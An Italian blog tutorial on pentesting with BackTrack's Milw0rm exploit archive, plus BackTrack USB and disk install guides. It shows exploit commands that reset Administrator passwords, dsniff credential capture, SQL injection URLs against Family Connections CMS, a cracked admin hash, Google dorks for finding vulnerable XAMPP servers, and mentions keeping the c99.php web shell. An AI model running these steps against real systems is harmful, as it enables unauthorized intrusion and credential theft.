BackTrack & Milw0rm Exploits Archive [+video]

milw0rm_cracker.jpg

***

Ciao a tutti,

eccoci arrivati a fare un altro dei nostri test che , personalmente , reputo tra i più interessanti.

Il tutorial che state per leggere comprende un pentesting , quello che andremo a fare in pratica è: come utilizzare la nostra BackTrack per fare un pentesting tramite l’ uso dell’ archivio degli exploits di milw0rm.com.

Per eseguire il nostro pentesting ci serviremo di:

  • L’ Archivio degli Exploits di Milw0rm.
  • nMap , per la scansione con opzioni per il fingerprinting.
  • Dsniff , esclusivamente per lo sniffing delle credenziali da localhost.

***

Ci tengo a dire che in questo tutorial non è stato fatto danno ad alcuno , tutti si svolge nella mia LAN . Ho provato a chiedere l’ autorizzazione a vari sysadmin , ma dopo aver upgradado le loro cosette non mi hanno nemmeno risposto… ….0 su 9.

Altra cosa importrante che mi sento di aggiungere è di ringraziare: KaB0T per la disponibilità ed  EikaF , senza il quale avremmo fatto un altro video lento ed incasinato , anche se da questo punto di vista dobbiamo ancora migliorare credo che si veda la differenza “in meglio” nei confronti dei video precedenti.

***

tutto il tutorial è referente interamente al video che abbiamo fatto , dal nome

“BackTrack & Milw0rm Exploits Archive” , naturalmente presente nella pagina /video.

è stato girato interamente con Fluxbox , ma le sezioni che io uso per Fluxbox sono identiche a quelle impostate di default in BackTrack per KDE , quindi non cambia nulla…

…Il video è scaricabile da Quì.

***

Innanzitutto voglio fare delle piccole precisazioni:

Il pc nella mia LAN ha un multiboot con: WinServer-2003.spk2-(FamilyConnection-CMS)- , WinServer-2000.spk3-(-XAMPP)- , Windows Xp spk2-(BadBlue-WebServerFileSharing)-.

Sono stati usati in tutto 3 exploits , per altrettante demo nel video.

Uno degli exploits è un exploit scritto da rGod e diretto verso uno Xampp… , (-nel video ultima demo-) , …cos’é uno Xampp?

lo Xampp è un “aggregato” di webserver e database , con tanto di interprete PHP , in pratica con lo xampp ho instalato sul sistema , poi preso come “vittima” , il webserver Apache , il database MySql e l’interprete PHP , per saperne di più potete darvi una leggerissima letta alla nostra pagina /Inf0-[IT]

Un altro exploit , (-nel video seconda demo-) , (scritto dal CWH Underground Hacking Team) , invece è diretto contro un CMS , il FamilyConnection CMS , una piattaforma tipo WordPress , solo che viene usata molto fra community.

L’ altro exploit , (-nel video prima demo-) , (scritto da J.Cervini su un Bug scoperto da L.Auriemma) , è diretto invece verso un webserver , il BadBlue. Il BadBlue è un semplice webserver utilizzato per il filesharing tra conoscenti , installandosi sul proprio sistema il BadBlue si possono in pratica condividere files di tutti i tipi.

tutti questi exploits utilizzati sono naturalmente corrispondenti ad una specifica versione dei corrispettivi server , CMS , applicazioni eccetera…

***

Ma facciamo una breve descrizione di cio che stiamo per fare…

Il team di remote-exploit.org , ha pensato bene di inserie un tool da riga di comando che permetta a tutti gli user di BackTrack di avere a disposizione , (anche OFF-Line) , un archivio di exploits per effettuare , in ogni situazione , un pentesting con il massimo grado di efficacia e lo ha fatto inserendo in BackTrack l’ archivio exploits di Milw0rm.

Milw0rm è un sito che raccoglie centinaia di Exploit & Shellcodes , scritti in vari tipi di linguaggi di programmazione e per tutti i tipi di piattaforme ed applicazioni , web e non.

[installazione Archivio per la BackTrack3.final]

Fino alla versione 3.beta della BackTrack un archivio degli exploits di milw0rm era inserito da installazione , dalla 3.final no , ma basta installarselo tramite Fast-Track , (tool multifunzione di cui scriveremo a breve…), quindi:

KdeStartMenù –> BackTrack –> Penetration –> Fast-Track ,

dal menù principale di Fast-Track scegliete la modalità “interactive“:

bt~# ./fast-track.py -i

In questo modo otterrete un altro menù , scegliete l’ opzione 1 , quindi la 4 e vi si installerà l’ archivio milw0rm. con lo script per l’ UPdate.

***

Fast-Track Updates

Enter a number to update

1. Update Fast-Track
2. Metasploit 3 Update
3. Aircrack-NG Update
4. Milw0rm Update
5. Nikto Plugin Update
6. W3AF Update
7. SQLMap Update
8. Installation Menu
9. Update Everything
10. Return to Main Menu

Enter number:

***

Oltre a Milw0rm ci sono molti altri siti che raccolgono , ed hanno un proprio archivio di exploits e di shellcodes , ma visto che tratteremo l’ uso di un archivio già presente in BackTrack , ( o almeno installabile – per la 3.final ) , descriveremo ed effettueremo un pentesting con l’ archivio di Milw0rm.

È possibile trovare sul sito Milw0rm materiale quali:  documenti , videotutorial , withepaper , il password cracker , un dizionario , ed è possibile inoltre ottenere tramite download lo stesso archivio degli exploits.

Una piccola , ma molto comoda , utility che Milw0rm offre è l’ estensione per Firefox che abilita la ricerca sullo stesso sito , volendo l’ opzione è disponibile quì.

Milw0rm è un sito che , insieme ad altri quali , solo per fare un esempio , SecurityReasonSecurity Focus , Packet Storm , Vulnerability Assestament , Securiteam …eccetera , ottiene nuovi exploits in maniera abbastanza “lesta” , tutti gli amministratori di sistemi traggono importanti informazioni da milw0rm , personalmente non credo che chiunque voglia essere al passo con la scoperta di nuove vulnerabilità possa fare a meno di passare per un sito come Milw0rm.

Non posso però evitare di dire che non tutte le vulnerabilità vengono rilevate ; che non tutte quelle rilevate vengono rivelate e che non si può essere MAI certi al 100% di conoscere tutte le vulnerabilità , è una cosa impossibile , ma tenersi aggiornati periodicamente è una cosa fondamentale , farlo tramite un sito di exploit pubblici come quelli che vi ho appena elencato è sicuramente un ottimo inizio.

Gli exploit che non sono ancora stati rivelati , che prendono il nome di 0day , sono quelli che possono causare più problemi di tutti , visto che la loro effettiva funzione viene scoperta a danno già fatto.

Va detto comunque che ci sono anche 0day che vengono rivelati direttamente dai siti che vi ho citato sopra , ma questa è una cosa che dipende da coloro che li rendono pubblici.

Fatte queste dovute premesse credo sia giusto scrivere qualcosa anche a riguardo degli exploits , almeno per rendere l’ idea a tutti di quello che stiamo facendo.

Un exploit è un programma , script , che permette di sfruttare delle vulnerabilità insite in applicazioni , programmi di varia natura e funzione , database o anche una semplice pagina web e che ci permette di poter eseguire sul sistema preso come obbiettivo dell’ attacco , del codice “maligno” , dannoso , cosa che normalmente non è possibile fare. L’ exploit , inteso come programma , o script , può rappresentare anche una stringa unica , come ad esempio nel caso dell’ Sql-Injection , basta andare su Milw0rm per rendersene conto.

Un exploit può essere scritto in vari tipi di linguaggii di programmazione , dal C al python , dal Php al Perl e così via… …e molte volte necessitano di compilazione.

Di seguito elencherò alcuni tipi di attacco , ma lo farò seguendo il metodo che ci interessa in questo tutorial , quindi secondo la suddivisione dell’ archivio degli exploits di milw0rm in rete , sullo stesso sito milw0rm , oppure secondo l’ archivio in BackTrack.

[UPdate Milw0rm Archive]

Facciamo , come bisognerebbe fare ogni qualvolta si intende eseguire un test di penetrazione tramite degli exploits , un UPdate dell’ archivio degli Exploits di Milw0rm , andiamo quindi in:

KdeStart –> BackTrack –-> Penetration –-> Milw0rmExploitArchive-> “…” , e da quì selezioniamo:Update Milw0rm Archive, in questo modo ci si aprirà una shell che automaticamente effettuerà l’ UPdate , otteniamo così tutto l’ archivio aggiornato degli exploits da milw0rm.com.

[Ricerca exploits]

Gli exploits che abbiamo ottenuto tramite il nostro UPdate si trovano nella seguente directory:

/pentest/exploits/milw0rm/ “………”

Ora , appena terminata la procedura di UPdate , andiamo nella directory indicata sopra direttamente da Konsole , con xTerm oppure con Konqueror , da quì possiamo vedere che nella directory ~/Milw0rm/ sono contenute altre subdirectory , ognuna identifica una serie di exploits equivalenti a determinati tipi di piattaforme …platforms , o porte …rport.

Dalle subdirectory in ~/platforms/… windows , unix , solaris …eccetera si dividono poi in attacchi da remote o local.

***

Grazie ad una novità di ./str0ke , (admin di milw0rm.com) , che ha creato una lista di exploits appositamente per BackTrack , (dal nome appunto “sploitlist-bt.txt) , il metodo di ricerca per gli exploits che si trovano all’ interno dell’ archivio Milw0rm in BackTrack , si esegue tramite il comando grep , sempre da shell e naturalmente all’ interno della directory che contiene le liste di exploits in formato *.txt , una dal nome sploitlist.txt e l’ altro sploitlist-bt.txt

In questo modo , se ci serve ad esempio un exploit per il Vista , ci basterà dare il comando:

bt~# grep Vista sploitlist-bt.txt

e ci verranno restituite le subdirectory con gli exploits disponibili.

Per fare un semplice esempio , nel nostro caso , trattandosi per quanto riguarda il pentesting contro il sistema con Windows XP.professional , del webserver BadBlue andrò dapprima nella directory corretta e poi cercherò con il comando grep gli exploits disponibili , nel modo seguente:

bt ~# cd /pentest/exploits/milw0rm/

bt milw0rm # grep BadBlue sploitlist-bt.txt

..ed ecco il risultato ottenuto.

***

./platforms/windows/remote/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
./platforms/windows/remote/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow
./platforms/windows/remote/4715.txt BadBlue <= 2.72b Multiple Remote Vulnerabilities
./platforms/windows/remote/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit
./rport/80/845.c BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
./rport/80/847.cpp BadBlue 2.55 Web Server Remote Buffer Overflow
./rport/80/4784.pl BadBlue 2.72 PassThru Remote Buffer Overflow Exploit

***

[Attacco con Exploits]

Arrivati ai vari tipi di attacco facciamone , come è giusto , una brevissima descrizione fatta secondo le principali sigle su milw0rm , ovvero: DoS-PoC , Web-App , Shellcode , Local e Remote

[Attacco DoS e DDoS]:

La sigla DoS sta a significare Denial of Service , e la sigla DDos sta invece per Distribuite-Denial of Service.

Come dicono le stesse sigle , il successo di questo tipo di attacco sta nel diniego del servizio , distribuito nel secondo caso , (DDoS) , singolo nel primo.

Queste parole in stile “traduzione” , dovrebbero rendere già l’idea del significato di un attacco DoS oppure DDoS , il suo funzionamento sta nel far arrivare al sistema vittima un attacco , o un insieme di attacchi , che rendono inaccessibile il sistema ; ma come può avvenire ciò?

La risposta è facile: un sito , che si raggiunge con una connessione ad internet , può esserci negato quando ad esempio siamo senza banda , senza linea praticamente , e saturare la banda a disposizione del sistema potrebbe essere quindi già un metodo per effetuare un DoS. Un attacco alla banda di un sistema potrebbe avvenire ad esempio tramite un eccessivo numero di richieste di accesso , ed il sistema , se non preparato , non potrà che andare fuori uso.

È ancora oggi famoso ciò che accadde nel Febraio del 2000 , quando al sistema di Yahoo! venne sferrato un attacco di tipo DDoS , e rimase inaccessibile per delle ore. L’ attacco sferrato partì da centinaia di host in giro per la rete che a sua volta furono violati precedentemente.(…Tahnx! to OpenSkills)

Il sistema di attacco DoS non è compromettente , è facile capire che se viene effettuato un DoS tramite la saturazione di una banda , una volta che la stessa tornerà attiva i problemi svaniranno…. ….almeno fino al prossimo attacco (!?), ma non è comunque una cosa che compromette il sistema.

[La sigla PoC]:

La sigla PoC sta a significare “Proof of concept” , abbozzo o progetto da terminare , inserita con lo scopo di dimostrare la fondatezza di un determinato progetto. Negli elenchi degli exploits sul sito milw0rm.com , la sigla PoC viene riportata quando coloro che scoprono il bug e ne scrivono successivamente l’ exploit corrispondente , mostrano con delle spiegazioni l’ eseguibilità del loro lavoro.

breve esempio:

nell’ ultima demo del videotutorial si esegue un attacco verso uno Xampp , l’ exploit come già detto scritto da rGod , contiene commentata una serie di stringhe che ne spiegano l’ efficacia , questo il contenuto del PoC nell’ exploit ./3738.php di rGod

***

mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .

If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:

intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows

note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have  magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/

***

[Attacco in local] :

L’ attacco in local è quell’ attacco che si svolge all’ interno di una rete indipendende , anche se non del tutto , o si ha già comunque un certo accesso alla rete stessa. Un esempio può essere quello di fare dello sniffing nella propria LAN oppure acquisire i privilegi di amministratore del sistema da utente semplice. Un esempio di sniffing può essere quello che ho descritto nell’ esempio fatto con Ettercap e che dimostra appunto come poter fare “sniffing” di username e password all’ interno di una LAN.

Gli attacchi in local sono però di varia natura , anche se la maggiorparte , vista la questione di permessi , sono effettuati su sistemi M$Windows , ce ne sono anche molti per sistemi UNIX-based , l’ exploit n° 5052 ,(quando parlo di numeri , mi rivolgo al numero occupato dall’ exploit all’ interno dell’ archivio milw0rm), infatti è proprio propenso al local root exploitation su sistemi GNU/Linux.

[Attacco in remoto]:

L’attacco in remoto è quella tipologia di attacco che si effettua da una postazione totalmente estranea all’ obbiettivo , che si trova quindi su di un altro dominio , e di cui non si ha nessun permesso d’ accesso.

È logico capire che ogni tipo di attacco può o no essere fine a se stesso , oppure può essere utilizzato in concomitanza con altre tipologie di attacco.

***

In questo caso ho elencato esclusivamente alcuni tipi di attacco , solo per rendere l’ idea , se si và sul sito milw0rm.com si possono trovare sigle del tipo RFI , LFI , Loca Root Exploits eccetera… , a tutte queste descrizioni sia giusto rimandarvi al portale informatico di Wikipedia.

***

Andiamo avanti con il tutorial , il primo pentesting , (terza demo nel video) ,  viene eseguito sullo Xampp , dalla directory esatta , come sopra eseguo da shell il comando:

bt milw0rm # grep XAMPP sploitlist-bt.txt

ed eccone il risultato:

./platforms/windows/remote/3738.php XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

./platforms/windows/local/4325.php XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit
./rport/80/3738.php XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

***

L’ exploit che useremo è il 3738.php , e per essere eseguito basta dare un occhiata alla matrice stessa dell’ explot , basta dare da shell il comando come eseguibile preceduto dall’ interprete quindi:

php ./3738.php

il tutto naturalmente dopo essere entrati nelle directory elencate dal comando grep.

bt milw0rm # cd platforms/windows/remote/

Con il comando appena eseguito ci verrà elencata tutta la “matrice” dell’ exploit , chi l’ ha scritto , la piattaforma , il bug e in che modo deve essere eseguito , e infatti ecco il risultato…

***

bt remote # php ./3738.php

—————————————————————————
XAMPP for Windows <= 1.6.0a adodb.php/mssql_connect() remote buffer overflow
proof-of-concept exploit
seh overwrite method / 2000 sp3 version
mail: retrog at alice dot it
site: http://retrogod.altervista.org
—————————————————————————

—————————————————————————
Usage: php ./3738.php host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-S only send the second packet
Example:
php ./3738.php localhost VER -P1.1.1.1:80
php ./3738.php localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
Administrators /ADD sun -p81 -S
—————————————————————————

***

Come possiamo vedere dalla lista di informazioni che ci viene restituita all’ interno della nostra shell , l’ exploit per essere eseguito necessita di alcune informazioni. Ogni exploit per essere eseguito necessita di informazioni diverse , ci sono exploit compilati e da compilare , e tutti sono eseguibili con successo , naturalmente , solo se il sistema vittima è affetto dalla vulnerabilità che l’ exploit andrà ad usare lo Xampp deve essere alla versione <=1.6.0a , rigorosamente , come possiamo leggere dalla matrice stessa , per Windows.

Vediamo ora di eseguire l’ exploit con i dovuti comandi…

Un esempio che ci viene mostrato dall’ exploit è il seguente:

php ./3738.php localhost VER -P1.1.1.1:80

Noi , avendo un server su cui provarlo , daremo il seguente comando da konsole:

php ./3738.php 29.230.6.73 net user Administrator komintern

dove:. net user Administrator komintern è il comando che verrà eseguito sul server dopo il BoF , ovvero il cambio della password dalla precedente a komintern sul sistema del mio vicino di casa con il quale mi trovo nella stessa Lan…comando che per funzionare , questo va detto , mi ha costretto a modificare varie opzioni nel database e vari files di configurazione del PHP , php.ini eccetera.

Una volta cambiata la password dell’ Administrator , apro una sessione Telnet e mi connetto al Server con le credenziali create , per mostrarle ho fatto un semplicissimo sniffing con dsniff sulla mia stessa interfaccia di rete , con il comando:

bt remote # dsniff -i ath0

che naturalmente ha funzionato alla perfezione mostrandomi le credenziali di accesso al server ovvero:

—————–
06/30/08 21:32:12 tcp 29.230.6.74.42449 -> 29.230.6.73.23 (telnet)

KominternAdministrator
komintern

Aperta la sessione Telnet sono stato in grado di inetragire con tutto il sistema , la maggiorparte delle volte infatti se il servizio Telnet è abilitato , solo l’ Administrator può interagire con il Desktop del sistema , non si lascia interagire un utente “normale” o anche del gruppo Administrators… …ma questo di solito , poi ognuno configura la propria rete come vuole.

Il giallo sta a rappresentare un semplice errore di sniffing di dsniff , perchè volendo copiare la parola komintern senza doverla digitare in seguito , e come potete vedere dal video lo username è stato unicamente Administrator , provando a dare meglio l’ idea dsniff ha raccolto le credenziali in modo totale , senza che poi il login abbia o no avuto successo.

È ovvio che ho preso il caso dello xampp perché volevo realizzarci un video e fare una piccola dimostrazione , ma se ci saremmo dovuti occupare di fare pentesting su di un server esterno le cose non sarebbero cambiate di molto , ad ogni versione di MySQL , di PHP di CMS eccetera , corrispondono delle vulnerabilità e degli exploits , e con l’ archivio di Milw0rm nella nostra BackTrack , abbiamo la possibilità di effettuare tutti i test che vogliamo. La maggiorparte delle volte che si sente parlare di siti che pubblicano exploits in “malomodo” , succede per il semplice fatto che chi fa danni , al 99% dei casi non va a scegliersi un obbiettivo da attaccare , che sarebbe a mio modo di vedere la cosa , sempre male ma che dimostra capacità , ma lo fà andando in giro per dork , ovvero trovare in google tutti i siti vulnerabili per poi prendere il primo che capita e fare il danno… …cosa che , a quanto pare , rende più famosi , ma molto semplice ed inutile.

***

Andiamo adesso ad effettuare il nostro pentesting contro un sistema che ha come OS WindowsXpPro , nel video la prima demo.

facciamo una scansione delle porte tramite nMap , e vediamone il risultato…

***

bt ~ # nmap -sS -sV -T Aggressive 29.230.6.73 -v

Starting Nmap 4.50 ( http://insecure.org ) at 2008-05-16 11:18 GMT
Initiating ARP Ping Scan at 11:18
Scanning 29.230.6.73 [1 port]
Completed ARP Ping Scan at 11:18, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:18
Completed Parallel DNS resolution of 1 host. at 11:18, 0.05s elapsed
Initiating SYN Stealth Scan at 11:18
Scanning 29.230.6.73 [1711 ports]
Discovered open port 81/tcp on 29.230.6.73
Discovered open port 139/tcp on 29.230.6.73
Discovered open port 912/tcp on 29.230.6.73
Discovered open port 445/tcp on 29.230.6.73
Discovered open port 135/tcp on 29.230.6.73
Discovered open port 4662/tcp on 29.230.6.73
Completed SYN Stealth Scan at 11:19, 7.24s elapsed (1711 total ports)
Initiating Service scan at 11:19
Scanning 6 services on 29.230.6.73
Completed Service scan at 11:19, 11.07s elapsed (6 services on 1 host)
SCRIPT ENGINE: Initiating script scanning.
Initiating SCRIPT ENGINE at 11:19
Completed SCRIPT ENGINE at 11:19, 0.21s elapsed
Host 29.230.6.73 appears to be up … good.
Interesting ports on 29.230.6.73:
Not shown: 1705 filtered ports
PORT STATE SERVICE VERSION
81/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
912/tcp open ftp vsftpd or WU-FTPD
4662/tcp open edonkey?
MAC Address: 00:13:8F:EB:1D:DD (Asiarock Incorporation)
Service Info: OS: Windows

Host script results:
|_ Discover OS Version over NetBIOS and SMB: Windows XP

Read data files from: /usr/local/share/nmap
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.845 seconds
Raw packets sent: 3417 (150.346KB) | Rcvd: 7 (318B)

***

bene , come possiamo vedere sul sistema “vittima” ci sono , oltre a delle porte aperte che potrebbero essere sfruttate in altro modo , delle informazioni che possono esserci molto preziose , infatti dalle ultime righe possiamo benissimo leggere:

***

PORT STATE SERVICE VERSION
81/tcp open http BadBlue httpd 2.7

***

Sulla porta 80 quindi c’é in esecuzione il BadBlue , alla versione 2.7.

Il BadBlue è un webserver che permette di poter condividere , pubblicamente o no , tutti i files , documenti , foto eccetera.

Il BadBlue a questa versione , che nMap ci ha restituito , contiene però una vulnerabilità che è molto grave come falla e ci permette di penetrare il sistema e dopo aver causato un BufferOverFlow ci permette anche di ottenere una reverse shell , i comandi , shellcode compreso , sono già tutti contenuti all’ interno dell’ exploit.

potete vedere benissimo dal video che non solo sono penetrato , grazie all’ exploit , all’ interno del sistema , ma ho anche cambiato la password dell’ amministratore del sistema stesso con il seguente comando:

net user KaB0T brigante

C:\> net user KaB0T brigante

(KaB0T è il nome di un mio vicino di casa con il quale mi condivido spesso la connessione…)

Il terzo ed ultimo esempio di pentesting , nel video seconda demo , con exploits targati milw0rm l’ ho fatto con una semplicissima SQL-Injection… …semplicissima per chi la usa , come nel nostro caso , ma per realizzare l’ exploit non è così semplice.

La SQL-Injection che ho usato per questo test va a colpire una vulnerabilità insita nel CMS-Family Connection , alla versione 1.4.

sempre con la stessa procedura , mi sono spostato nella directory giusta…

bt ~ # cd /pentest/exploits/milw0rm/

ed ho raccolto i possibili risultati dall’ archivio con il comando grep:

bt milw0rm # grep Family sploitlist-bt.txt

e questo è stato il risultato:

./platforms/php/remote/892.txt phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
./platforms/php/remote/1208.pl phpMyFamily <= 1.4.0 SQL Injection Exploit
./platforms/php/remote/5811.txt Family Connections CMS 1.4 Multiple Remote SQL Injection Vulnerability

***

Ottenuto il risultato per il FamilyConnection-CMS cui mi trovavo davanti , sono andato nella directory giusta:

bt milw0rm # cd platforms/php/remote/

dopodiché essendo un file *.txt potevo aprirlo come volevo , con nano , vim , kate , visto che non finisce in shell come i precedenti due esempi l’ ho aperto con lo Scintilla… …lo SciTE , editor adattabile a molti linguaggi di progrmmaione compreso in BackTrack di prima installazione , quindi:

bt remote # SciTE 5811.txt

aperto il file *.txt ho letto le seguenti indicazioni:

***

First you must register for access to user section then SQL Injection Exploit !!!

———-
Exploits
———-
[+] /addressbook.php?address=<SQL Injection>
[+] /familynews.php?getnews=<SQL Injection>&newsid=2
[+] /home.php?action=results&poll_id=<SQL Injection>

***

dopodiché ho eseguito l’ Injection ed ho ottenuto le credenziali di accesso dell’ amministratore del sito , ovvero:

***

admin : 6970ff8bb08f3c1bde2f49c608ac4b21

***

Una volta preso l hash dell’ admin , vado direttamente sul sito di milw0rm.com sul link cracker e inserisco l hash selezionando naturalmente come opzione di criptatura md5 , aspetto non molto , visto che già l’ avevo fatta prima l’ operazione e ottengo la password con la quale in seguito effettuo l’ accesso al CMS come amministratore.

Naturalmente avrei potuto fare anche una prova con John The Ripper o altre soluzioni OFF-Line inserite in BackTrack , ma parlando dell’ archivio degli exploits di milw0rm.com ho ritenuto migliore soluzione lavorare con lo stesso cracker di milw0rm , oltretutto in questo modo si contribuisce ad aggiungere un altro hash crackato , sperando sempre che non finisca nelle mani sbagliate.

Questa è solo una semplicissima dimostrazione di come è possibile fare pentesting con estrema facilità e nel minor tempo possibile , del resto da un’ accoppiata come Milw0rm & BackTrack ci si può aspettare solo il top.

Spero di essere stato abbastanza chiaro , per ogni cosa nella pagina /video c’é il videotutorial di questo How-To… per ogni chiarimento siamo in canale e in mailinglist.

I commenti quì nel blog cortesemente , usateli come comnmenti , non come help-desk.

Ciao a tutti e alla prossima.

Annunci

Installazione di BackTrack-3.final su usb da linux

Questa è un’altra guida molto semplice che spiega come installare da linux la nostra copia di BackTrack-3.final su una pen drive USB.

Ciò di cui abbiamo bisogno è questo:


-Una distribuzione linux per l’installazione
-La .iso della BackTrack 3 scaricabile dal wiki di Remote-Exploit linkato sul lato destro del nostro blog
-Una pen drive di almeno 1 GB (2 GB raccomandati)

Iniziamo:

1- Scarichiamo la nostra copia di Backtrack sul nostro pc (la release per usb naturalmente).

2- Ora creiamo un punto di mount nella nostra cartella /mnt che ci servirà per fare il mount della nostra .iso:

%mkdir /mnt/iso

***

3- Dopo esserci posizionati nella destinazione in cui abbiamo scaricato la nostra Backtrack possiamo fare il mount della iso nella cartella che abbiamo appena creato:

%mount -o loop -t iso9660 bt3final_usb.iso /mnt/iso

***

4- Facciamo il mount alla pen drive:

%mount /dev/sda1 /mnt/pendrive

***

sda1 corrisponde alla mia pen drive non è detto che a voi sia rilevata nel mio stesso modo; /mnt/pendrive è il punto di mount che ho impostato , se a voi è diverso dovete scrivere il vostro

***

4- Fatto questo sarà necessario copiare le 2 cartelle che avete creato quindi boot e bt3 situate in /mnt/iso nella nostra pen drive

***

5- Ora non ci resta da far altro che rendere bootable la nostra penna usb e lo faremo così:
%cd /mnt/pendrive/boot


%bootinst.sh

***

***

6- Diamo conferma con INVIO e facendo il reboot dovrebbe partire BackTrack (naturalmente dovete aver precedentemente impostato il vostro Bios per boot da Usb)

Ciao a tutti e alla prossima

[edit]

scrivo queste due righe per precisare che la procedura eseguita con la 3.beta a riguardo dei livechenges può essere in egualmodo adattata alla 3.final , quindi chi vuole può far riferimento alla guida BackTrack tutto dalla 2.final alla 3.beta , nella sezione /install.

Chi invece vuole , sempre da usb , usare la BackTrack-3.final con il metodo descritto per la 2.final , può crearsi delle partizioni e salvarci i cambiamenti secondo il metodo descritto in questo post sul forums.remote-exploit.org.

[/edit]

Installazione di BackTrack-3.final su usb da windows.

Questa piccola guida riprende una guida reperibile su internet che tratta dell’installazione su pen drive di una distribuzione knoppix , è stata dunque riadattata per la Backtrack e l’abbiamo preferita alle altre perché è davvero semplicissima.

Questo è ciò di cui avete bisogno per avere la vostra Backtrack su usb:

pen drive di almeno 1 GB.

un pc con sistema operativo windows installato (xp o vista).

la *.iso (versione apposita per usb) di Backtrack 3 reperibile dal WiKi (wallaper di BackTrack 3 a destra della colonna centrale del blog)

file fixkp2.exe .

Ora seguite questi passaggi:

1-Scaricate il file eseguibile fixkp2.exe da questo indirizzo: http://www.pendrivelinux.com/downloads/fixkp2.exe ed eseguitelo, verrà creata automaticamente una cartella denominata USB-Knoppix nella destinazione che imposterete a vostro piacimento.

2-Scaricate la *.iso di Backtrack e spostatela nella cartella precedentemente creata cioè USB-Knoppix.

3-Cliccate il file fixkp2.bat presente nella cartella USB-Knoppix e seguite le istruzioni che vi vengono date. {Dovete inizialmente inserire la lettera corrispondente alla vostra pen drive , (già inserita precedentemente), poi vi verrà chiesto se siete disposti a formattarla(dovete confermare con ‘y‘), l’estrazione e la copia dei files sulla penna avverrà automaticamente, infine vi verrà chiesto se volete rendere bootable la vostra pen drive e voi naturalmente dovete confermare’y‘}.

***

***

***

***

4- Riavviate il vostro pc e impostate il vostro BIOS affinché faccia il boot da usb , salvate i cambiamenti e riavviate nuovamente.

5- Eseguito il reboot (con pen drive inserita), dovrebbe partire la vostra copia di Backtrack dalla memoria usb.

Questi sono 2 screenshoot della versione USB di Backtrack 3.final . Potete notare la grafica accattivante di Compiz Fusion già pronto all’uso 😉

***

***

***

Ciao a tutti e alla prossima.

[edit]

scrivo queste due righe per precisare che la procedura eseguita con la 3.beta a riguardo dei livechenges può essere in egualmodo adattata alla 3.final , quindi chi vuole può far riferimento alla guida BackTrack tutto dalla 2.final alla 3.beta , nella sezione /install.

Chi invece vuole , sempre da usb , usare la BackTrack-3.final con il metodo descritto per la 2.final , può crearsi delle partizioni e salvarci i cambiamenti secondo il metodo descritto in questo post sul forums.remote-exploit.org.

[/edit]

Install BackTrack-3.final on HD [+comunicazione]

***

Ciao a tutti ,

La BackTrack-3.final è uscita da 90 giorni circa  e sono anche felice di aggiungere che i download sono arrivati ad oltre 2.000.000 !!!

Come sempre potete scaricare la vostra versione dal link con il Wallpaper che porta al Wiki , a destra della colonna principale del blog.

Detto questo , il team di remote-exploit.org ha variato alcune cose:

  • Non c’é l’ installer , per installare la BackTrack-3.final sul proprio HD con procedura HDinstall , usando un metodo non ufficiale , potete scaricarvi lo script dal BOX del Blog , (prog.backtrack)  ,  salvarlo in formato *.kmdr in /usr/share/slax/ , (secondo la vecchia directory) ,  ed avviarlo.

questa l immagine dell installer…

***

backtrack3inst

***

naturalmente questo riguarda solo l installer , per le fasi precedenti vi basta leggere le guide nella sezione /install.

  • Ci sono alcune cosette che mancano , esempio : il pakage manager slapt-get e di conseguenza anche il Pak.Manager con la GUI , GSlapt-Get. – manca anche l’ archivio degli exploits di milw0rm , tutto ciò che vi ho appena detto è installabile facilmente e con molta più sicurezza e stabilità usando il tool multifunzione Fast-Track… …da cui è possibile fare anche molte altre cose , che non tarderemo a spiegarvi.
  • Manca quella che nella 3.beta era la directory contenente gli strumenti di HouseKepeeng , praticamente la c99.php Build 16 e il resto. Io personalmente li ho riportati dalla beta alla final , ma sono comunque strumenti reperibili ovunque.
  • Stiamo scrivendo un tutorial sull’ installazione della BT-3.final su usb , aspettatelo presto.

***


***

Comunicazione:

Stiamo cercando di aprire un sito… …uno vero , non su wordpress ma di primo dominio.

il dominio è preso , manca l’ hosting che non è un problema , ma scrivo questo per chiedervi gentilmente di non prendere più questo blog come un help-desk , non ho/abbiamo più la possibilità di rispondervi , se volete aiuto siete pregati di recarvi in canale potete farlo anche direttamente da BackTrack , con xChat , le istruzioni e le FAQ le trovate QUÌ

A presto.

Fluxbox menu for BackTrack-3.beta


Ciao a tutti ,

eccoci ancora a scrivere di Fluxbox , questa volta non come configurazione , ma di come mettere a posto i link ai programmi e directory che il WM putroppo oggi presenta in granparte corrotti di default in BackTrack.

Ho ricompilato interamente tutto il menu di Fluxbox in maniera diversa , ovvero mettendo al posto dei link ai programmi e alle directory già presenti , le stesse identiche directory e programmi come sono strutturati in KDE… …sezione per sezione , sottodirectory per sottodirectory.

Vi dico subito che ho provato e riprovato , ma sono obbligato a dirvi di usarlo a vostro rischio , comunque il link sembrano tutti a posto , ho fixato secondo il Wiki di BackTrack tutti i bugs che ho visto , quindi se vedete che il programma lanciato dal menù sotto , non funziona , accertatevi prima di aver corretto il bug secondo il Wiki di remote-exploit.org.

